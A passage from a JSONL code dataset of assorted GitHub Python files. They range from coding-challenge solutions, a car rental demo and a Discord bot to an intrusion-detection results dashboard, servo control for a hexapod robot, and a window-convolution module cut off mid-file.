print(my_graph.topo_sort())\n # print(my_graph.graph)\n\n print(my_graph.topo_sort())\n\n \n\n pass\n\n# main()","repo_name":"soomro-abd/Data-Structures","sub_path":"Assignment 5/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10077941290","text":"import shelve\nfrom SPARQLWrapper.SPARQLExceptions import QueryBadFormed, EndPointNotFound, EndPointInternalError\nimport appdirs\nimport os\nimport errno\n\n# Not sure if complete list of exceptions that can be thrown\n# When query goes bad\n_catch_exceptions = (\n QueryBadFormed, EndPointNotFound, EndPointInternalError\n)\n\ndb_dir = appdirs.user_cache_dir(appname='synbiohub_adapter')\ndb_file = os.path.join(db_dir, 'queries.db')\n\ntry:\n os.makedirs(db_dir)\nexcept OSError as e:\n if e.errno != errno.EEXIST:\n # Directory does not exists, something else went wrong\n raise\n else:\n # Directory already exists, ignore error\n pass\n\n\ndef wrap_query_fn(fn, db_file_path=None):\n if db_file_path is None:\n db_file_path = db_file\n\n def wrapped_fn(*args):\n # Just join the args into one string as the query key\n q_key = \", \".join((str(x) for x in args))\n\n try:\n result = fn(*args)\n # Run the query function then cache the results\n with shelve.open(db_file_path) as db:\n db[q_key] = result\n except _catch_exceptions as e:\n\n # Query failed, try to load the results from the cache\n import sys\n sys.stderr.write('Query failed, using fallback cache: {}\\n'.format(e))\n\n try:\n with shelve.open(db_file_path) as db:\n result = db[q_key]\n except Exception:\n # If fail to get cached value, re-raise the original exception instead.\n raise e\n\n return result\n\n return wrapped_fn\n","repo_name":"SD2E/synbiohub_adapter","sub_path":"synbiohub_adapter/cache_query.py","file_name":"cache_query.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"33737605036","text":"import json\n\nfrom car import Car\nfrom client import Client\nfrom rental import Rental\nfrom system import CarSystem\n\n\ndef quick_client_status(cl):\n print(f\"{cl.name} has rented {len(cl.cars)} cars.\")\n print(f\"{cl.name} balance: {cl.money}\\n\")\n\n\nwith open('cars.json') as json_cars:\n cars = json.load(json_cars)\n\nsystem = CarSystem([Car.from_dict(car) for car in cars])\nsystem.list_available_cars()\n\n# client_1\nHristo = Client('Hristo', 8000)\nHristo_rental1 = Rental('CB7628BA', hours=8, days=2)\nHristo_rental2 = Rental('A2277TA', weeks=2)\nHristo_rental3 = Rental('CT7777TT', days=1)\nHristo_rental4 = Rental('A2277TA', hours=5, days=3)\nsystem.rent([Hristo_rental1, Hristo_rental2, Hristo_rental3, Hristo_rental4], Hristo)\nquick_client_status(Hristo)\n\n# client_2\nIvan = Client('Ivan', 5000)\nIvan_rental1 = Rental('PB2924TC', hours=10)\nIvan_rental2 = Rental('PB6797KM', days=8)\nIvan_rental3 = Rental('PB7781HA', weeks=2)\nIvan_rental4 = Rental('PB3407HH', hours=6)\nsystem.rent(\n [Ivan_rental1, Ivan_rental2, Ivan_rental3, Ivan_rental4],\n Ivan\n)\nquick_client_status(Ivan)\n","repo_name":"pasat170/car-oop","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34967696145","text":"print(\"Challenge 26: Write a Python program to find the number of zeros at the end of a factorial of a given positive number.\")\n\nimport math\n\nnum = int(input(\"Enter a number: \"))\n\nfactorial = math.factorial(num)\n\n\ndef end_zeros():\n new_num = str(factorial)\n count = len(new_num) - len(new_num.rstrip(\"0\"))\n return count\n\nprint(end_zeros())","repo_name":"Yuma-Tsushima07/Python101","sub_path":"Python101/Challenges/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"17463400939","text":"class Solution:\n def romanToInt(self, s: str) -> int:\n nums = {\"M\": 1000, \"D\": 500, \"C\": 100, \"L\": 50, \"X\": 10, \"V\": 5, \"I\": 1}\n total = 0\n for i in range(len(s)):\n int_val = nums[s[i]]\n if i + 1 < len(s) and nums[s[i + 1]] > int_val:\n total -= int_val\n else:\n total += int_val\n return total\n","repo_name":"EdmundMartin/PythonInterviewPrep","sub_path":"leetcode/13_roman_to_integer.py","file_name":"13_roman_to_integer.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27733527563","text":"from unittest import TestCase\n\nfrom OnlineStore.src.domain_layer.store.buying_policy.atomic_buying_term import AtomicBuyingTerm\nfrom OnlineStore.src.domain_layer.store.buying_policy.atomic_buying_user_term import AtomicBuyingUserTerm\nfrom OnlineStore.src.domain_layer.store.buying_policy.composite_buying_term import CompositeBuyingTerm\nfrom OnlineStore.src.domain_layer.store.discont_policy.atomic_term import AtomicTerm\nfrom OnlineStore.src.domain_layer.store.discont_policy.composite_term import CompositeTerm\nfrom OnlineStore.src.domain_layer.store.store import Store\n\n\nclass TestCompositeBuyingTerm(TestCase):\n def setUp(self):\n product_name = \"milki\"\n quantity_or_price = \"q\"\n operator = \"=\"\n value = 20\n self.basketDTO = basketDTO = {\n \"milki\": (20, 50, \"milki\"), # key - product name value - (quantity, price)\n \"shoko\": (20, 50, \"milki\"),\n \"avocado\": (20, 50, \"veg\")\n }\n self.userDTO = {\n \"age\": 20,\n \"user_name\": \"moshe\"\n }\n self.atomic_term4: AtomicBuyingTerm = AtomicBuyingTerm(product_name, quantity_or_price, operator, value) # True\n self.atomic_term1: AtomicBuyingUserTerm = AtomicBuyingUserTerm(\"age\", \">\", 18) # True\n self.atomic_term2: AtomicBuyingUserTerm = AtomicBuyingUserTerm(\"age\", \">\", 22) # False\n self.atomic_term3: AtomicBuyingUserTerm = AtomicBuyingUserTerm(\"age\", \"<\", 22, no_flag=True) # False\n #self.comp1: CompositeBuyingTerm = CompositeBuyingTerm(\"AND\", self.atomic_term4, self.atomic_term1) # True\n #self.comp2: CompositeBuyingTerm = CompositeBuyingTerm(\"AND\", self.atomic_term2, self.atomic_term1) # false\n\n def test_calc_term(self):\n comp1: CompositeBuyingTerm = CompositeBuyingTerm(\"AND\", self.atomic_term4, self.atomic_term1) # True\n self.assertTrue(comp1.calc_term(self.basketDTO, self.userDTO))\n comp2: CompositeBuyingTerm = CompositeBuyingTerm(\"AND\", self.atomic_term2, self.atomic_term1) # false\n self.assertFalse(comp2.calc_term(self.basketDTO, self.userDTO))\n self.assertFalse(self.atomic_term3.calc_term(self.basketDTO, self.userDTO))\n comp3 = CompositeBuyingTerm(\"OR\", self.atomic_term3, comp1 )\n self.assertTrue(comp3.calc_term(self.basketDTO, self.userDTO))\n\n\n\n\n\n\n\n","repo_name":"ihugtrees/WorkshopSEProject212","sub_path":"OnlineStore/tests/developer_tests/unit_tests/store/buying_policy/test_composite_buying_term.py","file_name":"test_composite_buying_term.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2036433770","text":"import streamlit as st\n# Set a black background for the entire app\nst.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True\n)\n\nst.title(\"AI in network Security\")\nst.header(\"Data Statistics\")\n\n\nimage_path = \"networks/normalVSattack.png\"\n\n# Display the image using st.image\nst.image(image_path, caption='Your Image Caption', use_column_width=True)\nimage_path1 = \"networks/top5attacks.png\"\nst.image(image_path1, caption='Your Image Caption', use_column_width=True)\nimage_path2 = \"networks/noOfrestAttacks.png\"\nst.image(image_path2, caption='Your Image Caption', use_column_width=True)\n\nst.subheader(\"Feature Importance\")\n#heading for feature importance\nst.header(\"Binary Classification\")\nimage_path4 = \"networks/featureImpBin.png\"\nst.image(image_path4, caption='Your Image Caption', use_column_width=True)\n\nimage_paths = {\n 'Random Forest': 'networks/rfBin.png',\n 'Naive Bais': 'networks/naiveBin.png',\n 'Logisic Regression': 'networks/lrBin.png',\n 'MLP': 'networks/mlpBin.png',\n 'K Nearest Neighbors': 'networks/knnBin.png',\n 'Variational Autoencoders': 'networks/vaeBin.png',\n 'Convolutional Neural Networks': 'networks/cnnBin.png',\n 'Isolation Forest': 'networks/isolationBin.png',\n 'Adaboost': 'networks/AdaBoostBin.png'\n # Add more images as needed\n}\n\n# Create a selectbox to choose from the available images\nselected_image_name = st.selectbox(\"Select a model for Binary Classification\", list(image_paths.keys()))\n\n# Use an if-else statement to determine the selected image path\nif selected_image_name in image_paths:\n selected_image_path = image_paths[selected_image_name]\n st.image(selected_image_path, caption=f'Selected Image: {selected_image_name}', use_column_width=True)\nelse:\n st.write(\"Image not found.\")\nst.subheader(\"Feature Importance\")\n#heading for feature importance\nst.header(\"Multiclass Classification\")\nimage_path5 = \"networks/featureImpMulti.png\"\nst.image(image_path5, caption='Your Image Caption', use_column_width=True)\n\nimage_paths = {\n 'Random Forest': 'networks/rfMulti.png',\n 'Naive Bais': 'networks/naiveMulti.png',\n 'Logisic Regression': 'networks/lrMulti.png',\n 'MLP': 'networks/mlpMulti.png',\n 'K Nearest Neighbors': 'networks/knnMulti.png'\n }\nimage_path6 = \"networks/attacks.png\"\nst.image(image_path6, caption='Your Image Caption', use_column_width=True)\n\n# Create a selectbox to choose from the available images\nselected_image_name = st.selectbox(\"Select a model for Multi Classification\", list(image_paths.keys()))\n\n# Use an if-else statement to determine the selected image path\nif selected_image_name in image_paths:\n selected_image_path = image_paths[selected_image_name]\n st.image(selected_image_path, caption=f'Selected Image: {selected_image_name}', use_column_width=True)\nelse:\n st.write(\"Image not found.\")\n\n# Dictionary mapping attack names to their feature importance images\nimage_paths1 = {\n 'Neptune': 'networks/FIneptune.png',\n 'Satan': 'networks/FISatan.png',\n 'Smurf': 'networks/FIsmurf.png',\n 'IPSweep': 'networks/IPSweep.png',\n 'PortSweep': 'networks/portSweep.png'\n}\n\n# Create a selectbox to choose from the available attacks\nselected_attack_name = st.selectbox(\"Select an attack to see its feature importance\", list(image_paths1.keys()))\n\n# Use an if-else statement to determine the selected image path\nif selected_attack_name in image_paths1:\n selected_image_path = image_paths1[selected_attack_name]\n st.image(selected_image_path, caption=f'Selected Attack: {selected_attack_name}', use_column_width=True)\nelse:\n st.write(\"Image not found.\")\n\n\n\n\n\n \n","repo_name":"dishachopra/AI-in-Network-Security","sub_path":"networks/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8814604234","text":"import argparse\nimport os\nimport time\n\nfrom environments.mountain_car import MountainCar\nimport agents.agent\nfrom utils.experiment import Experiment\nfrom utils.helper_functions import ensure_dirs, setup_logger, memory_usage_psutil\nfrom sweeper import Sweeper\n\n\ndef run():\n start = time.time()\n\n parser = argparse.ArgumentParser(description=\"run_file\")\n parser.add_argument('--idx', default=0, type=int, help='identifies run number and configuration')\n parser.add_argument('--config-file', default='config_files/actor_critic.json')\n\n args = parser.parse_args()\n project_root = os.path.abspath(os.path.join(os.path.dirname(__file__)))\n sweeper = Sweeper(os.path.join(project_root, args.config_file))\n cfg = sweeper.parse(args.idx)\n\n cfg.env_instance = MountainCar(cfg)\n agent_class = getattr(agents.agent, cfg.agent_class)\n agent = agent_class(cfg)\n\n log_dir = cfg.get_logdir()\n ensure_dirs([log_dir])\n steps_log = os.path.join(log_dir, 'steps_log')\n steps_logger = setup_logger(steps_log, stdout=True)\n cfg.log_config(steps_logger)\n ep_log = os.path.join(log_dir, 'ep_log')\n ep_logger = setup_logger(ep_log, stdout=False)\n cfg.log_config(ep_logger)\n\n exp = Experiment(agent, cfg.env_instance, max_steps=cfg.max_steps, seed=args.idx,\n steps_log=steps_log, ep_log=ep_log)\n exp.run_step_mode()\n\n print(\"Memory used: {:5} MB\".format(memory_usage_psutil()))\n print(\"Time elapsed: {:5.2} minutes\".format((time.time() - start) / 60))\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"zaheersm/classic-control","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"23139755452","text":"from queue import PriorityQueue\n\ndef solve(q):\n cnt = 1\n e = q.get()[1][1]\n\n while not q.empty():\n s2, e2 = q.get()[1]\n if s2>=e:\n cnt += 1\n e = e2\n\n return cnt\n\ndef main():\n n =int(input())\n\n q = PriorityQueue()\n\n for i in range(n):\n t = list(map(int, input().split()))\n\n q.put([t[1], t])\n\n print(solve(q))\n\nif __name__ == '__main__':\n main()","repo_name":"spa46/programming_contest","sub_path":"baekjoon/doit/1931/1931.py","file_name":"1931.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71128934910","text":"from discord.ext import commands\nimport discord\nimport data.secrets\nimport time\nimport aiosqlite\nimport os\n\nintents = discord.Intents.all()\n\nbot = commands.Bot(command_prefix=data.secrets.bot_prefix, help_command=None, intents=intents, case_insensitive=True)\n\n@bot.event\nasync def on_ready():\n setattr(bot,\"link_db\",await aiosqlite.connect(r\"data\\databases\\links.db\"))\n setattr(bot,\"star_db\",await aiosqlite.connect(r\"data\\databases\\stars.db\"))\n async with bot.link_db.cursor() as cursor:\n await cursor.execute(\"CREATE TABLE IF NOT EXISTS links (channel_id INTEGER, message_id INTEGER, user_id INTEGER, gdrive_id TEXT, object_size INTEGER)\")\n\n async with bot.star_db.cursor() as cursor:\n await cursor.execute(\"CREATE TABLE IF NOT EXISTS stars (channel_id INTEGER,msgauthorid INTEGER, messageid INTEGER, starboardmsgid INTEGER, numstars INTEGER)\")\n await cursor.execute(\"CREATE TABLE IF NOT EXISTS stats (mem_id INTEGER, received INTEGER, given INTEGER, idols TEXT, beta TEXT)\")\n await bot.change_presence(activity=discord.Game(name=\"Megadrive\"))\n print(\"Bot is ready!\")\n\n_start_time = time.time()\n\n\nif __name__ == '__main__':\n # When running this file, if it is the 'main' file\n # i.e. its not being imported from another python file run this\n for module in data.secrets.module_list:\n bot.load_extension(f\"modules.{module}\")\n \n for file in os.listdir(r\"modules\\required\"):\n if file.endswith(\".py\") and not file.startswith(\"_\"):\n bot.load_extension(f\"modules.required.{file[:-3]}\")\n\n bot.run(data.secrets.bot_token)\n","repo_name":"jsmsj/NOT-cycbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"74697359231","text":"from flask import Flask,Blueprint\nfrom src.dynamopipeline import status\n\n\n# Rota /healthcheck\nhealthcheck = Blueprint('healthcheck',__name__)\n\n@healthcheck.route('')\n@healthcheck.route('/')\ndef Healthcheck():\n '''\n \n '''\n msg = \"

    Sistema Online

    \" \n \n return msg, 200\n","repo_name":"clodonil/code-metrics","sub_path":"code-metrics-api/src/controllers/healthcheck/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33647175213","text":"\"\"\"\nKata description:\n\nAcknowledgments:\nI thank yvonne-liu for the idea and for the example tests :)\n\nDescription:\nEncrypt this!\n\nYou want to create secret messages which can be deciphered by the Decipher this! kata. Here are the conditions:\n\nYour message is a string containing space separated words.\nYou need to encrypt each word in the message using the following rules:\nThe first letter needs to be converted to its ASCII code.\nThe second letter needs to be switched with the last letter\nKeepin' it simple: There are no special characters in input.\nExamples:\nencrypt_this(\"Hello\") == \"72olle\"\nencrypt_this(\"good\") == \"103doo\"\nencrypt_this(\"hello world\") == \"104olle 119drlo\"\n\"\"\"\n\n\ndef encrypt_this(text):\n if not text:\n return ''\n temp = text.split(' ')\n result = []\n for i in temp:\n word = ''\n word += str(ord(i[0]))\n tmp = list(i[1:])\n if len(i) > 2:\n tmp[0], tmp[len(tmp) - 1] = tmp[len(tmp) - 1], tmp[0]\n word += ''.join(tmp)\n result.append(word)\n return ' '.join(result)\n\n\nprint(encrypt_this(\"Hello\"))\nprint(encrypt_this(\"good\"))\nprint(encrypt_this(\"hello world\"))\n","repo_name":"Stefi99R/Codewars_kata_solutions","sub_path":"6_kyu_katas/encrypt_this.py","file_name":"encrypt_this.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42530953947","text":"from aoc_tools import *\n\nwith open(\"input.txt\") as f:\n s = f.read()\n\ns = s.strip().split(\"\\n\\n\")\n\ns = [[int(x) for x in y.split(\"\\n\")] for y in s]\n\nprint(max(sum(z) for z in s))\n\ns.sort(key = lambda x : sum(x), reverse=True)\n\nprint(sum(sum(z) for z in s[:3]))\n","repo_name":"nthistle/advent-of-code","sub_path":"2022/day01/day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"60"} +{"seq_id":"5424607055","text":"# -*- encoding: utf-8 -*-\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.http import HttpResponse, HttpResponseBadRequest\nfrom b24online.stats.helpers import GeoIPHelper\n\nlogger = logging.getLogger(__name__)\ngeo = GeoIPHelper()\n\n\ndef get_main_c(obj):\n country = settings.GEO_COUNTRY_DB\n\n # Conditions for countries\n # http://dev.maxmind.com/geoip/legacy/codes/iso3166/\n if obj == 'az':\n return country['Azerbaydjan']\n elif obj == 'am':\n return country['Armenia']\n elif obj == 'by':\n return country['Belarus']\n elif obj == 'ge':\n return country['Georgia']\n elif obj == 'il':\n return country['Israel']\n elif obj == 'kz':\n return country['Kazakhstan']\n elif obj == 'kg':\n return country['Kyrgyzstan']\n elif obj == 'lv':\n return country['Latvia']\n elif obj == 'lt':\n return country['Lithuania']\n elif obj == 'md':\n return country['Moldova']\n elif obj == 'ru':\n return country['Russia']\n elif obj == 'us':\n return country['USA']\n elif obj == 'ua':\n return country['Ukraine']\n else:\n return None\n\n\nclass GeolocationMiddleware(object):\n def process_request(self, request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n\n if geo.is_valid_ip(ip):\n request.session['geo_ip'] = ip\n\n try:\n geo_info = geo.get_geoip_data(ip)\n except KeyError:\n geo_info = None\n request.session['geo_country'] = None\n\n if geo_info:\n request.session['geo_country'] = get_main_c(geo_info.country.iso_code.lower())\n else:\n request.session['geo_country'] = None\n\n request.session.modified = True\n return None\n\n","repo_name":"alexvnukoff/project","sub_path":"b24project/tpp/GeolocationFilterByRegion.py","file_name":"GeolocationFilterByRegion.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41118018067","text":"# Get values from input\na = int(input(\"a: \"))\nb = int(input(\"b: \"))\n\n# Accept two numbers and return the greatest common divisor and extend theirs \ndef extended_gcd(a, b):\n if b == 0:\n return a, 1, 0\n else:\n gcd, x, y = extended_gcd(b, a % b)\n return gcd, y, x - (a // b) * y\n\n\nprint(\"GDC:\", extended_gcd(a, b))\n","repo_name":"vickoman/ciberseguridad-cripto-aplicada","sub_path":"cryptohack/gdc-extend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15815555195","text":"# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries\r\n# SPDX-License-Identifier: MIT\r\n\r\nimport time\r\n\r\nfrom board import SCL, SDA\r\nimport busio\r\n\r\n# Import the PCA9685 module. Available in the bundle and here:\r\n# https://github.com/adafruit/Adafruit_CircuitPython_PCA9685\r\nfrom adafruit_motor import servo\r\nfrom adafruit_pca9685 import PCA9685\r\n\r\ni2c = busio.I2C(SCL, SDA)\r\n\r\n# Create a simple PCA9685 class instance.\r\npcaG = PCA9685(i2c, address=65)\r\npcaD = PCA9685(i2c, address=66)\r\n\r\nMAXPULSE=1890\r\n\r\npcaG.frequency = 50\r\npcaD.frequency = 50\r\n\r\n# Create all servo objects, specifying pin number, min and max values.\r\n\r\n#Patte Avant Gauche\r\n#Hanche\r\nhavg = servo.ContinuousServo(pcaG.channels[0], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Tibia\r\ntavg = servo.ContinuousServo(pcaG.channels[1], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Pointe\r\npavg = servo.ContinuousServo(pcaG.channels[2], min_pulse=1300, max_pulse=MAXPULSE)\r\n\r\n#Patte Milieu Gauche\r\n#Pointe\r\npmg = servo.ContinuousServo(pcaG.channels[4], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Tibia\r\ntmg = servo.ContinuousServo(pcaG.channels[5], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Hanche\r\nhmg = servo.ContinuousServo(pcaG.channels[6], min_pulse=1300, max_pulse=MAXPULSE)\r\n\r\n#Patte Arriere Gauche\r\n#Hanche\r\nharg = servo.ContinuousServo(pcaG.channels[12], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Tibia\r\ntarg = servo.ContinuousServo(pcaG.channels[13], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Pointe\r\nparg = servo.ContinuousServo(pcaG.channels[15], min_pulse=1300, max_pulse=MAXPULSE)\r\n\r\n#Patte Avant Droite\r\n#Pointe\r\npavd = servo.ContinuousServo(pcaD.channels[0], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Tibia\r\ntavd = servo.ContinuousServo(pcaD.channels[1], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Hanche\r\nhavd = servo.ContinuousServo(pcaD.channels[2], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Patte Milieu Droite\r\n#Pointe\r\npmd = servo.ContinuousServo(pcaD.channels[4], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Tibia\r\ntmd = servo.ContinuousServo(pcaD.channels[5], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Hanche\r\nhmd = servo.ContinuousServo(pcaD.channels[6], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Patte Arriere Droite\r\n#Pointe\r\npard = servo.ContinuousServo(pcaD.channels[15], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Tibia\r\ntard = servo.ContinuousServo(pcaD.channels[14], min_pulse=1300, max_pulse=MAXPULSE)\r\n#Hanche\r\nhard = servo.ContinuousServo(pcaD.channels[13], min_pulse=1300, max_pulse=MAXPULSE)\r\n## We sleep in the loops to give the servo time to move into position.\r\n#Hanches à 0\r\nhavg.throttle=0\r\nhavd.throttle=0\r\nhmd.throttle=0\r\nhmg.throttle=0\r\nharg.throttle=0\r\nhard.throttle=0\r\n\r\n#Pointes à 0\r\npavg.throttle=0\r\npavd.throttle=0\r\npmg.throttle=0\r\npmd.throttle=0\r\nparg.throttle=0\r\npard.throttle=0\r\n\r\n#Tibias à 0\r\ntavg.throttle=0\r\ntavd.throttle=0\r\ntmg.throttle=0\r\ntmd.throttle=0\r\ntarg.throttle=0\r\ntard.throttle=0\r\n\r\n#- = vers le bas\r\n# #+ = vers le haut\r\nwhile True:\r\n angle=int(input(\"Entrez l'angle de la pointe : \"))\r\n if(angle>0):\r\n pavg.throttle=-1\r\n pavd.throttle=1\r\n pmg.throttle=-1\r\n pmd.throttle=1\r\n parg.throttle=-1\r\n pard.throttle=1\r\n elif(angle<0):\r\n pavg.throttle=1\r\n pavd.throttle=-1\r\n pmg.throttle=1\r\n pmd.throttle=-1\r\n parg.throttle=1\r\n pard.throttle=-1\r\n else:\r\n pavg.throttle=0\r\n pavd.throttle=0\r\n pmg.throttle=0\r\n pmd.throttle=0\r\n parg.throttle=0\r\n pard.throttle=0\r\n time.sleep(0.003*abs(angle))\r\n pavg.throttle=0\r\n pavd.throttle=0\r\n pmg.throttle=0\r\n pmd.throttle=0\r\n parg.throttle=0\r\n pard.throttle=0\r\n \r\n angle5=int(input(\"Entrez l'angle du Tibia : \"))\r\n if(angle5<0): #Monte\r\n tavg.throttle=-1\r\n tavd.throttle=1\r\n tmg.throttle=-1\r\n tmd.throttle=1\r\n targ.throttle=-1\r\n tard.throttle=1\r\n elif(angle5>0): #descends\r\n tavg.throttle=1\r\n tavd.throttle=-1\r\n tmg.throttle=1\r\n tmd.throttle=-1\r\n targ.throttle=1\r\n tard.throttle=-1\r\n else:\r\n tavg.throttle=0\r\n tavd.throttle=0\r\n tmg.throttle=0\r\n tmd.throttle=0\r\n targ.throttle=0\r\n tard.throttle=0\r\n time.sleep(0.003*abs(angle5))\r\n if(angle5>0):\r\n tavg.throttle=-0.2\r\n tavd.throttle=0.2\r\n tmg.throttle=-0.2\r\n tmd.throttle=0.2\r\n targ.throttle=-0.2\r\n tard.throttle=0.2\r\n elif(angle5<0):\r\n tavg.throttle=0.2\r\n tavd.throttle=-0.2\r\n tmg.throttle=0.2\r\n tmd.throttle=-0.2\r\n targ.throttle=0.2\r\n tard.throttle=-0.2\r\n else:\r\n tavg.throttle=0\r\n tavd.throttle=0\r\n tmg.throttle=0\r\n tmd.throttle=0\r\n targ.throttle=0\r\n tard.throttle=0\r\n \r\n\r\n\r\n#i=10\r\n#flag=True\r\n#while True:\r\n# if flag:\r\n# i+=1\r\n# servo4.throttle = -0.5\r\n# else:\r\n# i-=1\r\n# servo4.throttle = 0.5\r\n#\r\n# if(i>=40):\r\n# flag=not flag\r\n# \r\n# elif(i<=10):\r\n# flag=not flag\r\n# time.sleep(0.003*abs(1))\r\n# servo4.throttle=0.0\r\n\r\n#- = vers le haut\r\n#+ = vers le bas\r\n#servo5.throttle = -1.0\r\n#angle5=40\r\n#time.sleep(0.003*angle5)\r\n#servo5.throttle=0.0\r\n\r\n\r\n\r\n \r\n\r\npca.deinit()","repo_name":"NickVanMarkes/Hexapode","sub_path":"app/mod_classes/tests/test_Servo.py","file_name":"test_Servo.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13230048312","text":"import math\nfrom fractions import Fraction\nimport numpy as np\nimport scipy.interpolate as interp\n\nfrom pyRSD.rsd.tools import RSDSpline as spline\nfrom pyRSD import pygcl\n\n_epsilon = np.finfo(float).eps\n\ndef G(p):\n \"\"\"\n Return the function G(p), as defined in Wilson et al 2015.\n\n See also: WA Al-Salam 1953\n\n Returns\n -------\n numer, denom: int\n the numerator and denominator\n \"\"\"\n toret = 1\n for p in range(p+1):\n if p == 0:\n toret *= 1.\n else:\n toret *= (1./2 + p - 1.)\n return int(2**p) * toret, math.factorial(p)\n\ndef get_coefficients(ell, ellprime, as_string=False):\n \"\"\"\n Return the window convolution coefficients\n\n Parameters\n ----------\n ell : int\n the multipole number of the spectra we are convolving\n ellprime : int\n the multipole number of the spectra that is leaking\n power via the convolution\n \"\"\"\n p = 0\n coeffs = []\n qvals = []\n ret_str = []\n for p in range(0, min(ell, ellprime)+1):\n\n numer = []\n denom = []\n\n # numerator of product of G(x)\n for r in [G(ell-p), G(p), G(ellprime-p)]:\n numer.append(r[0])\n denom.append(r[1])\n\n # divide by this\n a,b = G(ell+ellprime-p)\n numer.append(b)\n denom.append(a)\n\n numer.append((2*(ell+ellprime) - 4*p + 1))\n denom.append((2*(ell+ellprime) - 2*p + 1))\n\n q = ell+ellprime-2*p\n numer.append((2*ell+1))\n denom.append((2*q+1))\n\n numer = Fraction(np.prod(numer))\n denom = Fraction(np.prod(denom))\n if not as_string:\n coeffs.append(float(numer/denom))\n qvals.append(q)\n else:\n ret_str.append(\"%s L%d\" %(numer/denom, q))\n\n if not as_string:\n return qvals[::-1], coeffs[::-1]\n else:\n return ret_str[::-1]\n\nclass WindowConvolution(object):\n \"\"\"\n Compute the window-convolved configuration space multipoles\n\n This class takes the ell = 0, 2, 4 (,6) unconvolved power multipoles and\n the window multipoles as input and computes the convolved power multipoles\n\n Parameters\n ----------\n s : array_like, (Ns,)\n the separation vector\n W : array_like, (Ns, Nl)\n the even-ell configuration space window function multipoles,\n where Nl must be >= 5; the first column is the ell=0, second\n is ell=2, etc\n max_ellprime : int, optional\n the maximum value of ``ellprime`` to include when performing\n the linear combination of higher-order multipoles leaking\n into a mulitpole of order ``ell\n max_ell : int, optional\n maximum multipole number we want to convolve\n\n Reference\n ----------\n See Wilson et al, MNRAS Volume 464, Issue 3, p.3121-3130, 2017\n \"\"\"\n def __init__(self, s, W, max_ellprime=4, max_ell=4):\n\n # the values of the separation where window is defined\n self.s = s\n self.smin = s.min()\n self.smax = s.max()\n\n # the array of window multipoles\n self.W = W\n\n # ell and ell prime values\n self.max_ellprime = max_ellprime\n self.max_ell = max_ell\n\n # initialize the kernel splines\n self._setup_kernels()\n\n def _setup_kernels(self):\n \"\"\"\n Initialize the splines used to compute the convolution\n kernels for each ell from the discretely-measued\n window multipoles\n \"\"\"\n self.splines = {}\n kern = np.zeros((len(self.s), self.max_ellprime//2+1))\n W = self.W\n\n # ell is the multipole number of the convolved spectra\n for i, ell in enumerate(range(0, self.max_ell+1, 2)):\n\n # ellprime specifies power leakage from other multipoles into ell\n for j, ellprime in enumerate(range(0, self.max_ellprime+1, 2)):\n\n # the coefficients\n qvals, coeffs = get_coefficients(ell, ellprime)\n qinds = [q//2 for q in qvals]\n\n # this term is the sum of coefficients times the window multipoles\n kern[:,j] = np.einsum('...i,i...', W[:,qinds], np.array(coeffs))\n\n # store a 